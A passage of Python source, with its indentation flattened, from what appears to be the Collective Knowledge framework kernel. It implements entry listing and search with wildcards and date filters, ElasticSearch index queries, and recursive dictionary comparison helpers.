aida=i.get('add_if_date_after','')
aid=i.get('add_if_date','')
# Support ISO and human readable time
aidb=aidb.strip().replace(' ','T')
aida=aida.strip().replace(' ','T')
aid=aid.strip().replace(' ','T')
oaidb=None
oaida=None
oaid=None
sn=i.get('search_by_name','')
if aidb!='' or aida!='' or aid!='':
import datetime
if aidb!='':
rx=convert_iso_time({'iso_datetime':aidb})
if rx['return']>0: return rx
oaidb=rx['datetime_obj']
if aida!='':
rx=convert_iso_time({'iso_datetime':aida})
if rx['return']>0: return rx
oaida=rx['datetime_obj']
if aid!='':
rx=convert_iso_time({'iso_datetime':aid})
if rx['return']>0: return rx
oaid=rx['datetime_obj']
if oaidb!=None or oaida!=None or oaid!=None or sn!='':
iaf=True
dnatl=i.get('do_not_add_to_lst','')
idnatl=False
if dnatl=='yes': idnatl=True
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
muid=i.get('module_uid','')
duoa=i.get('data_uoa','')
lruoa=i.get('repo_uoa_list',[])
lmuoa=i.get('module_uoa_list',[])
lduoa=i.get('data_uoa_list',[])
# Check if need to force lower case for all entries
if cfg.get('force_lower','')=='yes':
ruoa=ruoa.lower()
muoa=muoa.lower()
muid=muid.lower()
duoa=duoa.lower()
lruoa=lower_list(lruoa)
lmuoa=lower_list(lmuoa)
lduoa=lower_list(lduoa)
to=float(i.get('time_out','30'))
elapsed_time=0
if duoa=='': duoa='*'
if muoa=='' and muid=='': muoa='*'
if ruoa=='': ruoa='*'
sff=i.get('filter_func','')
ff=i.get('filter_func_addr',None)
if sff!='':
ff=getattr(sys.modules[__name__], sff)
if ff!=None:
sd=i.get('search_dict',{})
ic=i.get('ignore_case','')
ss=i.get('search_string','')
if ic=='yes': ss=ss.lower()
# Check if wild cards present (only repo or data)
wr=''
wm=''
wd=''
if ruoa.find('*')>=0 or ruoa.find('?')>=0: wr=ruoa
if muoa.find('*')>=0 or muoa.find('?')>=0: wm=muoa
if duoa.find('*')>=0 or duoa.find('?')>=0: wd=duoa
if wr!='' or wm!='' or wd!='':
import fnmatch
zr={}
fixed_repo=False
if ruoa!='' and wr=='':
# Try to load a given repository
r=access({'action':'load',
'module_uoa':cfg['repo_name'],
'data_uoa':ruoa,
'common_func':'yes'})
if r['return']>0: return r
duid=r['data_uid']
zr[duid]=r
fixed_repo=True
else:
# Prepare all repositories
r=reload_repo_cache({}) # Ignore errors
if r['return']>0: return r
zr=cache_repo_info
# Start iterating over repositories
ir=0
iir=True
zrk=list(zr.keys())
lr=len(zrk)
finish=False
while iir:
skip=False
repo_dict={}
if fixed_repo:
if ir>0:
skip=True
iir=False
else:
ruid=zrk[0]
d=zr[ruid]
dd=d.get('dict',{})
repo_dict=dd
remote=dd.get('remote','')
if remote=='yes':
skip=True
else:
ruoa=d.get('data_uoa','')
p=dd.get('path','')
if ruid==cfg['repo_uid_default']: p=work.get('dir_default_repo','')
elif ruid==cfg['repo_uid_local']: p=work.get('dir_local_repo','')
elif ir==0:
ruoa=cfg['repo_name_default']
ruid=cfg['repo_uid_default']
p=work.get('dir_default_repo','')
elif ir==1:
ruoa=cfg['repo_name_local']
ruid=cfg['repo_uid_local']
p=work.get('dir_local_repo','')
if p=='':
skip=True
else:
if ir<lr+2:
ruid=zrk[ir-2]
d=zr[ruid]
dd=d.get('dict',{})
repo_dict=dd
remote=dd.get('remote','')
if remote=='yes':
skip=True
else:
ruoa=d.get('data_uoa','')
p=dd.get('path','')
else:
skip=True
iir=False
# Check if wild cards
if not skip and p!='' and wr!='':
if len(lruoa)>0 and (ruoa not in lruoa and ruid not in lruoa):
skip=True
elif wr=='*':
pass
elif is_uid(ruoa):
skip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(ruoa, wr):
skip=True
# Check if got proper path
if not skip and p!='':
# Prepare modules in the current directory
xm=[]
if muoa!='' and wm=='':
xm.append(muoa)
else:
# Now iterate over modules inside a given path
try:
lm=os.listdir(p)
except Exception as e:
None
else:
for fn in lm:
if os.path.isdir(os.path.join(p,fn)) and fn not in cfg['special_directories']:
xm.append(fn)
# Iterate over modules
for mu in xm:
r=find_path_to_entry({'path':p, 'data_uoa':mu})
if r['return']==0:
mp=r['path']
muid=r['data_uid']
muoa=r['data_uoa']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(repo_dict, muid, muoa)
mskip=False
if wm!='':
if len(lmuoa)>0 and (muoa not in lmuoa and muid not in lmuoa):
mskip=True
elif wm=='*':
pass
elif is_uid(muoa):
mskip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(muoa, wm):
mskip=True
if not mskip:
# Prepare data in the current directory
xd=[]
if duoa!='' and wd=='':
iii={'path':mp, 'data_uoa':duoa}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']==0:
xd.append(duoa)
else:
# Now iterate over data inside a given path
try:
ld=os.listdir(mp)
except Exception as e:
None
else:
for fn in ld:
if os.path.isdir(os.path.join(mp,fn)) and fn not in cfg['special_directories']:
if split_dirs!=0:
mp2=os.path.join(mp,fn)
try:
ld2=os.listdir(mp2)
except Exception as e:
None
for fn in ld2:
if os.path.isdir(os.path.join(mp2,fn)) and fn not in cfg['special_directories']:
xd.append(fn)
else:
xd.append(fn)
# Iterate over data
if len(lduoa)>0:
xd=lduoa
for du in xd:
iii={'path':mp, 'data_uoa':du}
if split_dirs!=0:
iii['split_dirs']=split_dirs
r=find_path_to_entry(iii)
if r['return']!=0: continue
dp=r['path']
dpcfg=os.path.join(dp,cfg['subdir_ck_ext'])
dpinfo=os.path.join(dp,cfg['subdir_ck_ext'],cfg['file_info'])
dpmeta=os.path.join(dp,cfg['subdir_ck_ext'],cfg['file_meta'])
tduid=r['data_uid']
tduoa=r['data_uoa']
if os.path.isdir(dpcfg): # Check if really CK data entry
dskip=False
if wd!='':
if len(lduoa)>0 and (tduoa not in lduoa and tduid not in lduoa):
dskip=True
elif wd=='*':
pass
# elif is_uid(tduoa):
# dskip=True # If have wildcards, but not alias
elif not fnmatch.fnmatch(tduoa, wd):
dskip=True
if not dskip:
# Iterate over data
ll={'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':tduoa, 'data_uid':tduid,
'path':dp}
# Need to load info?
if iaf or iprn:
if os.path.isfile(dpinfo):
y=load_json_file({'json_file':dpinfo})
if y['return']>0:
if not debug: continue
return y
ll['info']=y['dict']
# Need to load meta?
if iam:
if os.path.isfile(dpmeta):
y=load_json_file({'json_file':dpmeta})
if y['return']>0:
if not debug: continue
return y
ll['meta']=y['dict']
# Call filter
fskip=False
if ff!=None and ff!='':
ll['out']=o
ll['search_dict']=sd
ll['search_string']=ss
ll['ignore_case']=ic
ll['ignore_update']=iu
if oaidb!=None: ll['obj_date_before']=oaidb
if oaida!=None: ll['obj_date_after']=oaida
if oaid!=None: ll['obj_date']=oaid
if sn!=None: ll['search_by_name']=sn
rx=ff(ll)
if rx['return']>0:
if not debug: continue
return rx
if rx.get('skip','')=='yes':
fskip=True
# Append
if not fskip:
ils+=1
if not idnatl:
lst.append(ll)
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"list", "repo_uoa":"'+
ll.get('repo_uoa','')+'", "repo_uid":"'+
ll.get('repo_uid','')+'", "module_uoa":"'+
ll.get('module_uoa','')+'", "module_uid":"'+
ll.get('module_uid','')+'", "data_uoa":"'+
ll.get('data_uoa','')+'", "data_uid":"'+
ll.get('data_uid','')+'"\n',
'append':'yes'})
if rl['return']>0: return rl
if o=='con':
x=''
if iprf: x=ruoa+':'+muoa+':'
if sys.version_info[0]<3:
y=tduoa
try: y=y.decode(sys.stdin.encoding)
except Exception as e:
try: y=y.decode('utf8')
except Exception as e: pass
x+=y
else: x+=tduoa
if ipru: x+=' ('+tduid+')'
if iprn:
name=ll.get('info',{}).get('data_name','')
if name!='':
x=name+' ('+x+')'
out(x)
# Check timeout
elapsed_time = time.time() - start_time
if to!=-1 and elapsed_time>to:
finish=True
break
# Check size
if ls>0 and ils==ls:
finish=True
break
if finish: break
if finish: break
# Finish iteration over repositories
ir+=1
if o=='con' and i.get('print_time','')=='yes':
out('Elapsed time: '+str(elapsed_time)+' sec., number of entries: '+str(ils))
rr={'return':0, 'lst':lst, 'elapsed_time':str(elapsed_time)}
if finish: rr['timed_out']='yes'
return rr
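# Example (illustrative comment-only sketch; assuming the standard 'list'
# action mapping and a hypothetical 'program' module): listing entries with
# their info and a 10-second timeout.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'list', 'module_uoa':'program', 'data_uoa':'*',
#                  'add_info':'yes', 'time_out':'10'})
#   if r['return']==0:
#       for e in r['lst']: print(e['data_uoa'])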
##############################################################################
# List data with search
def list_data2(i):
o=i.get('out','')
rr=list_data(i)
lst=rr['lst']
if len(lst)==0 and cfg.get('download_missing_components','')=='yes':
# Search on cKnowledge.org
import copy
oo=''
if o=='con': oo=o
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
# Try to download missing action/module
ry=download({'module_uoa':muoa,
'data_uoa':duoa,
'out':'con'})
if ry['return']>0: return ry
# Restart local search
rr=list_data(i)
return rr
##############################################################################
# Common action: search entries
#
# TARGET: CK kernel and low-level developers
def search(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
(repo_uoa_list) - list of repos to search
              (module_uoa_list)      - list of modules to search
              (data_uoa_list)        - list of data entries to search
(add_if_date_before) - add only entries with date before this date
(add_if_date_after) - add only entries with date after this date
(add_if_date) - add only entries with this date
(search_by_name) - search by name
(print_time) - if 'yes', print elapsed time at the end
(search_flat_dict) - search if these flat keys/values exist in entries
(search_dict) - search if this dict is a part of the entry
(tags) - add tags to search in format tags=x,y,z
or
(search_string) - search with expressions *?
(ignore_case) - if 'yes', ignore case of letters
(time_out) - in secs, default=30
(internal) - if 'yes', use internal search even if indexing is on
(limit_size) - by default 5000 or -1 if no limit
(start_from) - start from a specific entry (only for ElasticSearch)
(print_full) - if 'yes', show CID (repo_uoa:module_uoa:data_uoa)
(print_uid) - if 'yes', print UID in brackets
(print_name) - if 'yes', print name (and add info to the list)
(add_info) - if 'yes', add info about entry to the list
(add_meta) - if 'yes', add meta about entry to the list
(debug) - if 'yes', print debug info
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
elapsed_time - elapsed time in string
(timed_out) - if 'yes', timed out
}
"""
o=i.get('out','')
rr=search2(i)
if rr['return']>0: return rr
lst=rr['lst']
if len(lst)==0 and cfg.get('download_missing_components','')=='yes':
# Search on cKnowledge.org
import copy
oo=''
if o=='con': oo=o
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
ry=download({'module_uoa':muoa,
'data_uoa':duoa,
'out':'con'})
if ry['return']>0: return ry
# Restart local search
rr=search2(i)
return rr
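# Example (illustrative comment-only sketch; tags are hypothetical): searching
# entries by tags - this uses the indexing server when enabled and falls back
# to the internal filter-based search otherwise.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'search', 'module_uoa':'program', 'tags':'example,demo'})
#   if r['return']==0:
#       for e in r['lst']: print(e['path'])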
##############################################################################
# Original search
def search2(i):
o=i.get('out','')
ss=i.get('search_string','')
sd=i.get('search_dict',{})
ls=i.get('limit_size','5000')
rr={'return':0}
# Check tags
tags=i.get('tags','')
if tags!='':
xtags=tags.split(',')
xtags1=[]
for q in xtags:
xtags1.append(q.strip())
sd['tags']=xtags1
# Check if index
if i.get('internal','')=='yes' or cfg.get('use_indexing','')!='yes' or (i.get('module_uoa','')!='' and not index_module(i['module_uoa'],i.get('repo_uoa',''))):
if ss!='':
i['filter_func']='search_string_filter'
else:
sfd=i.get('search_flat_dict',{})
if len(sfd)>0:
r=restore_flattened_dict({'dict':sfd})
if r['return']>0: return r
nd=r['dict']
sd.update(nd)
del (i['search_flat_dict'])
i['filter_func']='search_filter'
i['search_dict']=sd
pf=i.get('print_full','')
if pf=='': pf='yes'
i['print_full']=pf
rr=list_data(i)
else:
import time
start_time = time.time()
b_add_meta=(i.get('add_meta','')=='yes')
b_add_info=(i.get('add_info','')=='yes')
# Check if using ElasticSearch via Python client
eec=False
if cfg.get('index_use_curl','')=='yes' or cfg.get('index_use_web','')=='yes':
eec=True
dss={} # Used with python ElasticSearch client
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
lruoa=i.get('repo_uoa_list',[])
lmuoa=i.get('module_uoa_list',[])
lduoa=i.get('data_uoa_list',[])
if ruoa!='': lruoa.append(ruoa)
if muoa!='': lmuoa.append(muoa)
if duoa!='': lduoa.append(duoa)
if len(lruoa)>0:
if ss!='': ss+=' AND '
ss+=' ('
first=True
for x in lruoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(repo_uid:'+xx1+x+xx1+') OR (repo_uoa:'+xx1+x+xx1+')'
ss+=')'
if len(lmuoa)>0:
if ss!='': ss+=' AND '
ss+='('
first=True
for x in lmuoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(module_uid:'+xx1+x+xx1+') OR (module_uoa:'+xx1+x+xx1+')'
ss+=')'
if len(lduoa)>0:
if ss!='': ss+=' AND '
ss+='('
first=True
for x in lduoa:
if first: first=False
else: ss+=' OR '
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+='(data_uid:'+xx1+x+xx1+') OR (data_uoa:'+xx1+x+xx1+')'
ss+=')'
# Check search keys
first=True
for u in sd:
v=sd[u]
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
if type(v)==list:
first1=True
for lk in v:
if first1:
first1=False
else:
ss+=' AND '
x=str(lk)
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+=u+':'+xx1+x+xx1
else:
x=str(v)
xx1='"'
if x.find('*')>=0 or x.find('?')>=0:
xx1=''
ss+=u+':'+xx1+x+xx1
# Check special parameters
aidb=i.get('add_if_date_before','')
aida=i.get('add_if_date_after','')
aid=i.get('add_if_date','')
# Support ISO and human readable time
aidb=aidb.strip().replace(' ','T')
aida=aida.strip().replace(' ','T')
aid=aid.strip().replace(' ','T')
sn=i.get('search_by_name','')
if sn!='':
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
xx1='"'
if sn.find('*')>=0 or sn.find('?')>=0:
xx1=''
ss+='data_name:'+xx1+sn+xx1
if aidb!='' or aida!='' or aid!='':
if first:
first=False
if ss=='': ss+='('
else: ss+=' AND ('
else:
ss+=' AND '
ss+='iso_datetime:'
if aid!='':
ss+='"'+aid+'"'
else:
ss+='['
if aida!='':
ss+='"'+aida+'"'
else:
ss+='*'
if aidb!='':
ss+=' TO "'+aidb+'"'
ss+='] '
# Finish query
if not first:
ss+=')'
# Prepare ElasticSearch query
try:
import urllib.parse as ur
except Exception as e:
import urllib as ur
path='/_search?'
if ss!='': path+='q='+ur.quote_plus(ss.encode('utf-8'))
if ls!='': path+='&size='+ls
# dss={'query':{'filtered':{'filter':{'terms':sd}}}}
dss={}
if i.get('debug','')=='yes':
out('Query string: '+ss)
out('')
ri=access_index_server({'request':'GET',
'path':path,
'dict':dss,
'original_string':ss,
'limit_size':ls,
'start_from':i.get('start_from','')})
if ri['return']>0: return ri
dd=ri['dict'].get('hits',{}).get('hits',[])
lst=[]
for qx in dd:
q=qx.get('_source',{})
ruoa=q.get('repo_uoa','')
ruid=q.get('repo_uid','')
muoa=q.get('module_uoa','')
muid=q.get('module_uid','')
duoa=q.get('data_uoa','')
duid=q.get('data_uid','')
path=q.get('path','')
to_add={'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid':duid,
'path':path}
if b_add_meta: to_add['meta']=q.get('dict')
if b_add_info: to_add['info']=q.get('dict')
lst.append(to_add)
if log_ck_entries:
lce=cfg.get('log_ck_entries','')
if lce!='':
rl=save_text_file({'text_file':lce,
'string':'"action":"find", "repo_uoa":"'+
ruoa+'", "repo_uid":"'+
ruid+'", "module_uoa":"'+
muoa+'", "module_uid":"'+
muid+'", "data_uoa":"'+
duoa+'", "data_uid":"'+
duid+'"\n',
'append':'yes'})
if rl['return']>0: return rl
if o=='con':
x=ruoa+':'+muoa+':'
if sys.version_info[0]<3:
y=duoa
try: y=y.decode(sys.stdin.encoding)
except Exception as e:
try: y=y.decode('utf8')
except Exception as e: pass
x+=y
else: x+=duoa
out(x)
rr['lst']=lst
rr['elapsed_time']=str(time.time() - start_time)
if o=='con' and i.get('print_time','')=='yes':
out('Elapsed time: '+rr['elapsed_time']+' sec., number of entries: '+str(len(lst)))
return rr
##############################################################################
# Search filter
#
# TARGET: CK kernel and low-level developers
def search_filter(i):
"""
Input: {
repo_uoa - repo UOA
module_uoa - module UOA
data_uoa - data UOA
path - path
(search_dict) - search if this dict is a part of the entry
(ignore_case) - if 'yes', ignore case of letters
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
}
"""
ic=i.get('ignore_case','')
# Check special info
info=i.get('info',{})
    if len(info)!=0:
oaidb=i.get('obj_date_before', None)
oaida=i.get('obj_date_after', None)
oaid=i.get('obj_date', None)
sn=i.get('search_by_name','')
# Check dates
if oaidb!=None or oaida!=None or oaid!=None:
idt=info.get('control',{}).get('iso_datetime','')
if idt!='':
rx=convert_iso_time({'iso_datetime':idt})
if rx['return']>0: return rx
oidt=rx['datetime_obj']
if oaidb!=None and oidt>oaidb: return {'return':0, 'skip':'yes'}
if oaida!=None and oidt<oaida: return {'return':0, 'skip':'yes'}
if oaid!=None and oidt!=oaid: return {'return':0, 'skip':'yes'}
# Check if search by name
if sn!='':
ro=find_string_in_dict_or_list({'dict':{'string':info.get('data_name','')},
'search_string':sn,
'ignore_case':ic})
if ro['return']>0: return ro
if ro['found']!='yes': return {'return':0, 'skip':'yes'}
# To be fast, load directly
p=i['path']
skip='yes'
sd=i.get('search_dict',{})
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta_old'])
if not os.path.isfile(p1):
return {'return':0, 'skip':'yes'}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
d=r['dict']
# Check directly
rx=compare_dicts({'dict1':d, 'dict2':sd, 'ignore_case':ic})
if rx['return']>0: return rx
equal=rx['equal']
if equal=='yes': skip='no'
return {'return':0, 'skip':skip}
##############################################################################
# Compare 2 dictionaries (recursively)
#
# TARGET: end users
def compare_dicts(i):
"""
Input: {
dict1 - dictionary 1
dict2 - dictionary 2
(ignore_case) - ignore case of letters
Note that if dict1 and dict2 has lists, the results will be as follows:
* dict1={"key":['a','b','c']}
dict2={"key":['a','b']}
EQUAL
* dict1={"key":['a','b']}
dict2={"key":['a','b','c']}
NOT EQUAL
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
equal - if 'yes' dictionaries are equal
}
"""
d1=i.get('dict1',{})
d2=i.get('dict2',{})
equal='yes'
bic=False
ic=i.get('ignore_case','')
if ic=='yes': bic=True
for q2 in d2:
v2=d2[q2]
if type(v2)==dict:
if q2 not in d1:
equal='no'
break
v1=d1[q2]
rx=compare_dicts({'dict1':v1,'dict2':v2, 'ignore_case':ic})
if rx['return']>0: return rx
equal=rx['equal']
if equal=='no':
break
elif type(v2)==list:
# For now can check only values in list
if q2 not in d1:
equal='no'
break
v1=d1[q2]
if type(v1)!=list:
equal='no'
break
for m in v2:
if m not in v1:
equal='no'
break
if equal=='no':
break
else:
if q2 not in d1:
equal='no'
break
if equal=='no':
break
v1=d1[q2]
if bic and type(v1)!=int and type(v1)!=float and type(v1)!=bool:
v1=v1.lower()
v2=v2.lower()
if v2!=v1:
equal='no'
break
return {'return':0, 'equal':equal}
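
# Illustrative checks mirroring the list semantics documented above:
#
#   r=compare_dicts({'dict1':{'key':['a','b','c']}, 'dict2':{'key':['a','b']}})
#   # -> r['equal']=='yes' : every value in dict2's list is present in dict1's list
#
#   r=compare_dicts({'dict1':{'key':['a','b']}, 'dict2':{'key':['a','b','c']}})
#   # -> r['equal']=='no'  : 'c' is missing from dict1's list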
##############################################################################
# Compare two flat dictionaries
#
# TARGET: end users
def compare_flat_dicts(i):
"""
Input: {
dict1 - dictionary 1
dict2 - dictionary 2
(ignore_case) - ignore case of letters
(space_as_none) - if 'yes', consider "" as None
(keys_to_ignore) - list of keys to ignore (can be wildcards)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
equal - if 'yes' dictionaries are equal
}
"""
d1=i.get('dict1',{})
d2=i.get('dict2',{})
equal='yes'
ic=False
x=i.get('ignore_case','')
if x=='yes': ic=True
san=None
x=i.get('space_as_none','')
if x=='yes': san=''
# Create common set of keys
keys=list(d1.keys())
for q in d2:
if q not in keys:
keys.append(q)
# If keys to ignore
kti=i.get('keys_to_ignore',[])
if len(kti)>0:
import fnmatch
x=[]
for q in keys:
skip=False
for k in kti:
if fnmatch.fnmatch(q,k):
skip=True
if not skip:
x.append(q)
keys=x
# Compare all keys
for q in keys:
v1=d1.get(q, san)
v2=d2.get(q, san)
if ic and type(v1)!=int and type(v1)!=float and type(v1)!=bool:
v1=v1.lower()
v2=v2.lower()
if v1!=v2:
equal='no'
break
return {'return':0, 'equal':equal}
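
# Illustrative usage (a sketch; the flat keys are hypothetical):
#
#   r=compare_flat_dicts({'dict1':{'##a':1, '##b':2}, 'dict2':{'##a':1},
#                         'keys_to_ignore':['##b*']})
#   # -> r['equal']=='yes' since '##b' is filtered out by the wildcard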
##############################################################################
# Find string in dict
#
# TARGET: end users
def find_string_in_dict_or_list(i):
"""
Input: {
dict - dictionary 1
(search_string) - search string
(ignore_case) - ignore case of letters
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
found - if 'yes', string found
}
"""
d=i.get('dict',{})
found='no'
wc=False
ss=i.get('search_string','')
if ss.find('*')>=0 or ss.find('?')>=0:
wc=True
import fnmatch
bic=False
ic=i.get('ignore_case','')
if ic=='yes':
bic=True
ss=ss.lower()
for q in d:
if type(d)==dict: v=d[q]
elif type(d)==list: v=q
else: v=str(q)
if type(v)==dict or type(v)==list:
rx=find_string_in_dict_or_list({'dict':v, 'search_string':ss, 'ignore_case':ic})
if rx['return']>0: return rx
found=rx['found']
if found=='yes':
break
else:
try: v=str(v)
except Exception as e: pass
if bic:
v=v.lower()
if (wc and fnmatch.fnmatch(v, ss)) or v==ss:
found='yes'
break
return {'return':0, 'found':found}
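
# Illustrative usage (a sketch) of the '*' wildcard documented above:
#
#   r=find_string_in_dict_or_list({'dict':{'name':'GCC 7.1.0'},
#                                  'search_string':'gcc*', 'ignore_case':'yes'})
#   # -> r['found']=='yes'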
##############################################################################
# Search filter
#
# TARGET: CK kernel and low-level developers
def search_string_filter(i):
"""
Input: {
repo_uoa - repo UOA
module_uoa - module UOA
data_uoa - data UOA
path - path
(search_string) - search with expressions *?
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
lst - [{'repo_uoa', 'repo_uid',
'module_uoa', 'module_uid',
'data_uoa','data_uid',
'path'}]
}
"""
# To be fast, load directly
p=i['path']
skip='yes'
ss=i.get('search_string','')
if ss=='':
skip='no'
else:
ic=i.get('ignore_case','')
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta'])
if not os.path.isfile(p1):
p1=os.path.join(p,cfg['subdir_ck_ext'],cfg['file_meta_old'])
if not os.path.isfile(p1):
return {'return':0, 'skip':'yes'}
r=load_json_file({'json_file':p1})
if r['return']>0: return r
d=r['dict']
# Check directly
rx=find_string_in_dict_or_list({'dict':d, 'search_string':ss, 'ignore_case':ic})
if rx['return']>0: return rx
found=rx['found']
if found=='yes': skip='no'
return {'return':0, 'skip':skip}
##############################################################################
# Access index server
#
# TARGET: CK kernel and low-level developers
def access_index_server(i):
"""
Input: {
request - request type ('PUT' | 'DELETE' | 'TEST' | 'GET')
(path) - path
(dict) - query as dict to send
(limit_size) - limit queries with this number (if 'GET')
(start_from) - start from a given entry in a query
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - returned dict
}
"""
request=i['request']
# Prepare URL
host=cfg.get('index_host','')
if host=='':
return {'return':1, 'error':'index host is not defined in configuration'}
url=host
port=cfg.get('index_port','')
if port!='':
url+=':'+port
path=i.get('path','')
xpath=path.split('/')
dd=i.get('dict',{})
ddo={}
if cfg.get('index_use_curl','')=='yes':
url+=path
import tempfile
fd1, fn1=tempfile.mkstemp(suffix='.tmp', prefix='ck-')
os.close(fd1)
os.remove(fn1)
fd2, fn2=tempfile.mkstemp(suffix='.tmp', prefix='ck-')
os.close(fd2)
os.remove(fn2)
r=save_json_to_file({'json_file':fn1, 'dict':dd})
if r['return']>0: return r
cmd='curl -X'+request+' '+url+' -d @'+fn1+' -s -o '+fn2
os.system(cmd)
# Read output
if not os.path.isfile(fn2):
return {'return':1, 'error':'problem accessing indexing server - maybe indexing server is down?'}
r=load_json_file({'json_file':fn2})
if os.path.isfile(fn1): os.remove(fn1)
if os.path.isfile(fn2): os.remove(fn2)
if r['return']>0: return r
ddo=r['dict']
elif cfg.get('index_use_web','')=='yes':
url+=path
try:
import urllib.request as urllib2
except:
import urllib2
try:
from urllib.parse import urlencode
except:
from urllib import urlencode
# Prepare post variables
r=dumps_json({'dict':dd, 'skip_indent':'yes'})
if r['return']>0: return r
s=r['string'].encode('utf8')
rq = urllib2.Request(url, s)
if request=='DELETE':
rq.get_method = lambda: request
not_found=False
try:
f=urllib2.urlopen(rq)
except urllib2.URLError as e:
se=format(e)
if request=='DELETE' and se.find('404')>0:
not_found=True
else:
return {'return':1, 'error':'problem accessing indexing server ('+se+')'}
if not not_found:
try:
s=f.read()
f.close()
except Exception as e:
return {'return':1, 'error':'can\'t parse output during indexing ('+format(e)+')'}
if sys.version_info[0]>2:
s=s.decode('utf8')
r=convert_json_str_to_dict({'str':s, 'skip_quote_replacement':'yes'})
if r['return']>0:
return {'return':1, 'error':'can\'t parse output from index server ('+r['error']+')'}
ddo=r['dict']
else:
# Check that elastic search client is installed
found_elasticsearch=True
try:
import elasticsearch
except Exception as e:
found_elasticsearch=False
pass
if not found_elasticsearch:
return {'return':1, 'error':'Python elasticsearch client library was not found; try to install it via "pip install elasticsearch"'}
# Init ElasticSearch
try:
es=elasticsearch.Elasticsearch([url])
except elasticsearch.ElasticsearchException as e:
return {'return':1, 'error':'problem initializing ElasticSearch ('+format(e)+')'}
es_index='ck'
es_doc_type='_doc'
# Check commands
if request=='TEST':
# Normally we already connected fine above
ddo=es.info()
ddo['health']=es.cluster.health()
ddo['status']=200
else:
es_id=''
if len(xpath)>1:
es_id+=xpath[1]
if len(xpath)>2:
es_id+='_'+xpath[2]
if request=='GET':
lsize=i.get('limit_size','')
if lsize!='' and lsize!=None:
lsize=int(lsize)
else:
lsize=1000
start_from=i.get('start_from','')
if start_from!='' and start_from!=None:
start_from=int(start_from)
else:
start_from=0
s=i.get('original_string','')
try:
ddo = es.search(index="ck",
body={"query": {
"query_string":{
"query":s,
"analyze_wildcard":True
}
},
"from":start_from,
"size":lsize})
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':33, 'error':'problem 33 accessing indexing server ('+se+')'}
elif request=='DELETE':
if path=='/_all':
try:
ddo=es.indices.delete(index=es_index, ignore=[400, 404])
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':2, 'error':'problem 2 accessing indexing server ('+se+')'}
else:
exists=True
try:
ddo=es.get(index=es_index, doc_type=es_doc_type, id=es_id)
except elasticsearch.ElasticsearchException as e:
es_status=e.info.get('status',0)
if es_status==404 or e.info.get('found')==False:
exists=False
if exists:
try:
ddo=es.delete(index=es_index, doc_type=es_doc_type, id=es_id)
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':3, 'error':'problem 3 accessing indexing server ('+se+')'}
elif request=='PUT':
try:
ddo=es.index(index=es_index, doc_type=es_doc_type, id=es_id, body=dd)
except elasticsearch.ElasticsearchException as e:
se=format(e)
return {'return':4, 'error':'problem 4 accessing indexing server ('+se+')'}
return {'return':0, 'dict':ddo}
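
# Illustrative health check (a sketch; the 'TEST' request is handled when the
# Python elasticsearch client is used, i.e. neither curl nor web access is set):
#
#   r=access_index_server({'request':'TEST'})
#   if r['return']==0 and r['dict'].get('status',0)==200:
#      out('indexing server is up')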
##############################################################################
# Add action to a module
#
# TARGET: CK kernel and low-level developers
def add_action(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - normally should be 'module' already
              data_uoa            - UOA of the module to which the action is added
func - action
(desc) - desc
              (for_web)           - if 'yes', make it a web API, i.e. allow access to this function in the CK server
(skip_appending_dummy_code) - if 'yes', do not append code
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
Output of 'update' function
}
"""
# Check if global writing is allowed
r=check_writing({})
if r['return']>0: return r
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
func=i.get('func','')
desc=i.get('desc','')
fweb=i.get('for_web','')
if muoa=='':
